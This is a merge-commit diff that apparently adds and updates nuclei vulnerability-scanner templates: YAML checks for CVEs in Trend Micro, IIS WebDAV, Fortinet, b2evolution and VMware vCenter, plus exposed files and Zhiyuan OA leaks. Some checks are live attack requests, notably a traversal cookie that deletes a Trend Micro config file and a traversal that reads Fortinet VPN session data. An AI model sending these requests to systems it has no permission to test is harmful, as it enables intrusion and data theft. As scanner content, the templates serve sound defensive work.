Merge pull request #15 from projectdiscovery/master

Updation

README.md

@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates      | Counts                         | Templates       | Counts                          | Templates        | Counts                         |
 | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
-| cves           | 200            | vulnerabilities | 94 | exposed-panels   | 74   |
-| exposures      | 52      | technologies    | 46      | misconfiguration | 44 |
+| cves           | 204            | vulnerabilities | 96 | exposed-panels   | 74   |
+| exposures      | 55      | technologies    | 46      | misconfiguration | 48 |
 | workflows      | 21        | miscellaneous   | 12     | default-logins   | 10 |
 | exposed-tokens | 9 | dns             | 6               | fuzzing          | 4          |
 | helpers        | 2        | takeovers       | 1         | -                | -                              |
 
-**61 directories, 584 files**.
+**61 directories, 597 files**.
 
 </td>
 </tr>

cves/2016/CVE-2016-7552.yaml

@@ -0,0 +1,27 @@
+id: CVE-2016-7552
+
+info:
+  name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
+  author: dwisiswant0
+  severity: critical
+  reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
+  tags: cve,cve2016
+
+  # This template exploits an authentication bypass vulnerability via a file delete in logoff.cgi
+  # which resets the admin password back to 'admin' upon a reboot.
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/logoff.cgi"
+    headers:
+      Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Backtrace"
+        part: header

cves/2017/CVE-2017-7269.yaml

@@ -0,0 +1,32 @@
+id: CVE-2017-7269
+
+info:
+  name: CVE-2017-7269
+  author: thomas_from_offensity
+  severity: critical
+  description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2
+
+# this was implemented based on the "check"-method in:
+# https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
+
+requests:
+  - method: OPTIONS
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "IIS/6.0"
+        part: header
+      - type: dsl
+        dsl:
+          - regex("<DAV:sql>", dasl)    # lowercase header name: DASL
+          - regex("[\d]+(,\s+[\d]+)?", dav)    # lowercase header name: DAV
+          - regex(".*?PROPFIND", public)    # lowercase header name: Public
+          - regex(".*?PROPFIND", allow)    # lowercase header name: Allow
+        condition: or
+        part: header

cves/2018/CVE-2018-13379.yaml

@@ -9,8 +9,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+      - "{{BaseURL}}/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
     matchers:
       - type: word
         words:
-          - "var fgt_lang ="
+          - "var fgt_lang"

cves/2019/CVE-2019-11581.yaml

@@ -33,4 +33,10 @@ requests:
       - type: word
         words:
           - "Contact Site Administrators"
-        part: body
+        part: body
+
+      - type: word
+        words:
+          - "has not yet configured this contact form"
+        part: body
+        negative: true

cves/2020/CVE-2020-14815.yaml

@@ -6,8 +6,7 @@ info:
   severity: medium
   reference: https://www.oracle.com/security-alerts/cpuoct2020.html
   tags: cve,cve2020,oracle,xss
-
-  # https://twitter.com/HackerOn2Wheels/status/1326927875279380480
+  source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
 
 requests:
   - method: GET
@@ -23,4 +22,6 @@ requests:
         words:
           - "X-Oracle-Dms-Ecid:"
           - "X-Oracle-Dms-Rid:"
+          - "Set-Cookie:"
         part: header
+        condition: and

cves/2020/CVE-2020-22840.yaml

@@ -0,0 +1,19 @@
+id: CVE-2020-22840
+
+info:
+  name: CVE-2020-22840
+  author: geeknik
+  severity: low
+  description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
+  tags: cve,cve2020,redirect,b2evolution
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
+
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+        part: header

cves/2021/CVE-2021-21972.yaml

@@ -0,0 +1,28 @@
+id: CVE-2021-21972
+
+info:
+  name: VMware vCenter Unauthorized RCE
+  author: dwisiswant0
+  severity: critical
+  reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
+  description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
+  tags: cve,cve2021,vmware,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "VSPHERE-UI-JSESSIONID"
+        part: header
+        condtion: and
+      - type: regex
+        regex:
+          - "(Install|Config) Final Progress"
+        part: body

exposures/apis/openapi.yaml

@@ -0,0 +1,28 @@
+id: openapi
+
+info:
+  name: OpenAPI
+  author: pdteam
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/openapi.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - application/openapi+json
+        part: header
+
+      - type: word
+        words:
+          - openapi
+          - paths
+        condition: and
+
+      - type: status
+        status:
+          - 200

exposures/apis/swagger-api.yaml

@@ -56,8 +56,9 @@ requests:
           - "swagger:"
           - "\"swagger\":"
           - "Swagger UI"
+          - "**token**:"
         condition: or
 
       - type: status
         status:
-          - 200
+          - 200

exposures/files/bower-json.yaml

@@ -0,0 +1,30 @@
+id: bower-json
+
+info:
+  name: bower.json file disclosure
+  author: oppsec
+  severity: info
+  description: Bower is a package manager which stores packages informations in bower.json file
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bower.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "name"
+          - "description"
+          - "main"
+        condition: and
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+      - type: status
+        status:
+          - 200

exposures/files/yarn-lock.yaml

@@ -0,0 +1,29 @@
+id: yarn-lock
+
+info:
+  name: yarn lock file disclosure
+  author: oppsec
+  severity: info
+  description: yarn.lock is a file which store all exactly versions of each dependency were installed.
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/yarn.lock"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY."
+          - "# yarn lockfile v1"
+        condition: and
+
+      - type: word
+        words:
+          - "text/html"
+        part: header
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/yarn-resourcemanager-rce.yaml

@@ -5,16 +5,20 @@ info:
   author: pd-team
   severity: low
   tags: apache,rce
+  reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
 
 requests:
   - method: POST
     path:
       - '{{BaseURL}}/ws/v1/cluster/apps/new-application'
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - 'application-id'
+          - application-id
+          - maximum-resource-capability
+        condition: and
       - type: status
         status:
           - 200
-    matchers-condition: and

vulnerabilities/other/zhiyuan-oa-info-leak.yaml

@@ -0,0 +1,26 @@
+id: zhiyuan-oa-info-leak
+
+info:
+  name: Zhiyuan Oa A6-s info Leak
+  author: pikpikcu
+  severity: info
+  reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
+  tags: zhiyuan,leak,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "attachment"
+          - "application/x-msdownload"
+        part: header
+        condition: and
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/zhiyuan-oa-session-leak.yaml

@@ -0,0 +1,26 @@
+id: zhiyuan-oa-session-leak
+
+info:
+  name: Zhiyuan Oa Session Leak
+  author: pikpikcu
+  severity: medium
+  reference: https://www.zhihuifly.com/t/topic/3345
+  tags: zhiyuan,leak,disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<usrID>"
+          - "<sessionID>"
+        condition: and
+
+      - type: status
+        status:
+          - 200